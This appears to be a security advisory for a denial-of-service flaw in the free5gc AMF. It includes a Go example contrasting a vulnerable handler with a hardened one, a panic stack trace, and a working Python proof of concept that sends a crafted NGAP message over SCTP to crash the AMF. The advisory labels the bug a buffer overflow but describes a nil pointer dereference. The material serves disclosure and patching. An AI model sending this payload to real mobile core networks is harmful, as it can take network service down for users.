@DDGod2025

DDGod2025/log Secret

Created November 8, 2025 08:12
free5gc <= v4.1.0 Buffer Overflow Vulnerability in AMF UplinkRANConfigurationTransfer Handling

CVE Information

Vendor: free5gc (https://free5gc.org)
Affected Product: free5gc AMF (Access and Mobility Management Function)
Affected Version: <= v4.1.0
Vulnerability Type: Buffer Overflow
Impact: Denial of Service (DoS)
Attack Vector: Remote (requires gNB connection)

Description

A buffer overflow vulnerability exists in the AMF component of free5gc when it processes a crafted UplinkRANConfigurationTransfer NGAP message. An attacker-controlled gNB can send a message whose TargetRANNodeID fields are missing or malformed, or which references a RAN context that does not exist, causing a nil pointer dereference and a crash of the AMF process.
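To show the defect class and its fix in the project's language, here is an added example that is not free5gc's own code: a stand-in AMF handler that dereferences the optional IEs and the RAN-context lookup unchecked, beside a hardened version that validates each level and returns an error instead of panicking. The IE types, the RanPool map and the PLMN/gNB identifiers are assumptions constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
)

// Stand-in types for the IEs involved (assumed for this example, not free5gc's
// own definitions); pointer fields mark IEs a malformed message may omit.
type GlobalRANNodeID struct{ PLMNID, GNBID string }
type TargetRANNodeID struct{ GlobalRANNodeID *GlobalRANNodeID }
type SONConfigurationTransfer struct{ TargetRANNodeID *TargetRANNodeID }
type UplinkRANConfigurationTransfer struct{ SONConfigurationTransferUL *SONConfigurationTransfer }

// AmfRan models a connected gNB; RanPool is the AMF-side context store keyed by
// PLMN ID + gNB ID (constructed here, not the project's real pool).
type AmfRan struct{ Forwarded int } // transfers relayed to this gNB
type RanPool map[string]*AmfRan

func ranKey(id *GlobalRANNodeID) string { return id.PLMNID + "/" + id.GNBID }

// handleVulnerable mirrors the failure mode in the advisory: it assumes every
// optional IE is present and that the target gNB exists, so a message that omits
// TargetRANNodeID or names an unknown gNB dereferences nil and panics.
func handleVulnerable(pool RanPool, msg *UplinkRANConfigurationTransfer) {
	target := pool[ranKey(msg.SONConfigurationTransferUL.TargetRANNodeID.GlobalRANNodeID)]
	target.Forwarded++ // nil pointer dereference when the lookup misses
}

// handleHardened checks each optional level and the lookup result, returning an
// error the caller can log (or answer with an ErrorIndication) instead of
// letting one malformed message take the whole AMF down.
func handleHardened(pool RanPool, msg *UplinkRANConfigurationTransfer) error {
	if msg == nil || msg.SONConfigurationTransferUL == nil {
		return errors.New("missing SONConfigurationTransferUL IE")
	}
	tgt := msg.SONConfigurationTransferUL.TargetRANNodeID
	if tgt == nil || tgt.GlobalRANNodeID == nil {
		return errors.New("missing TargetRANNodeID/GlobalRANNodeID")
	}
	target, ok := pool[ranKey(tgt.GlobalRANNodeID)]
	if !ok || target == nil {
		return fmt.Errorf("unknown target RAN %q", ranKey(tgt.GlobalRANNodeID))
	}
	target.Forwarded++
	return nil
}
```

A handler written this way still needs the caller to map the returned error onto the NGAP response it wants (ErrorIndication or silent drop), which is a policy decision the example leaves open.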

Proof of Concept (PoC)

The PoC script connects to the AMF over SCTP and sends a malicious NGAP message to trigger the crash. See poc.py for details.

Log Sample

The crash log (see log) shows a panic caused by an invalid memory address or nil pointer dereference in handleUplinkRANConfigurationTransferMain (handler.go:1842 in the trace).

Mitigation

Upgrade to free5gc > v4.1.0. Developers have acknowledged the issue (see reference).

Reference

log

2025-10-02T14:59:32.787009968+08:00 [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference
goroutine 12260206 [running]:
runtime/debug.Stack()
/usr/local/go/src/runtime/debug/stack.go:26 +0x5e
github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:186 +0x45
panic({0xf2d3c0?, 0x19eb0a0?})
/usr/local/go/src/runtime/panic.go:787 +0x132
github.com/free5gc/amf/internal/ngap.handleUplinkRANConfigurationTransferMain(0xc0002d5ef0, 0xc000a64400)
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/handler.go:1842 +0xbb
github.com/free5gc/amf/internal/ngap.handlerUplinkRANConfigurationTransfer(0xc0002d5ef0, 0xc001c01c00)
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/handler_generated.go:11897 +0xa2c
github.com/free5gc/amf/internal/ngap.dispatchMain(0xc0002d5ef0, 0x59?)
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/dispatcher_generated.go:116 +0x2e7
github.com/free5gc/amf/internal/ngap.Dispatch({0x12ad1b0, 0xc0014469e0}, {0xc006cbc000, 0x59, 0x40000})
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/dispatcher.go:49 +0x1d5
github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0014469e0, 0x40000, {0x115bad8?, 0x115bae8?, 0x115bae0?})
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:239 +0x3d5
created by github.com/free5gc/amf/internal/ngap/service.listenAndServe in goroutine 27
/home/yuqi/Project/free5gc/NFs/amf/internal/ngap/service/service.go:160 +0x88a
poc.py

import sctp
import socket
import sys
from socket import htonl

# Loopback addresses of the local free5gc test setup; adjust for the lab in use.
RAN_N2_IPV4_ADDR = "127.0.0.5"
AMF_N2_IPV4_ADDR = "127.0.0.5"


def connect_sctp(local_addr, remote_addr, local_port, remote_port):
    # One-to-one (TCP-style) SCTP socket, as a gNB uses for the N2 interface
    sock = sctp.sctpsocket_tcp(socket.AF_INET)
    sock.bind((local_addr, local_port))
    sock.connect((remote_addr, remote_port))
    return sock


def test_bug():
    # RAN connects to the AMF on the standard NGAP SCTP port (38412)
    try:
        conn = connect_sctp(RAN_N2_IPV4_ADDR, AMF_N2_IPV4_ADDR, 9486, 38412)
    except Exception as e:
        print(f"Failed to connect to AMF N2: {e}")
        sys.exit(1)

    # Pre-encoded NGAP UplinkRANConfigurationTransfer PDU that triggers the crash
    send_msg = b'\x000\x00T\x00\x00\x01\x00c\x00M$\x80\x00\x00\x00\x7f\xff\x80\x00\x00\xff\xff\x80\x01\xff\x00\x124V\xff\xff\xff\x00\xff\xff\xff@\xff\xff\xff\xbc\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x01\x00R\x00\x00\x01\x02|\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x01\x00\x01\x01'
    # NGAP is carried with SCTP payload protocol identifier 60
    conn.sctp_send(send_msg, ppid=htonl(60))
    try:
        # Once the AMF has crashed there is nothing to receive: recv returns b''
        recvMsg = conn.recv(2048)
        if recvMsg:
            print(recvMsg)
    except socket.timeout as e:
        print(f"No response: {e}")
    conn.close()


if __name__ == "__main__":
    test_bug()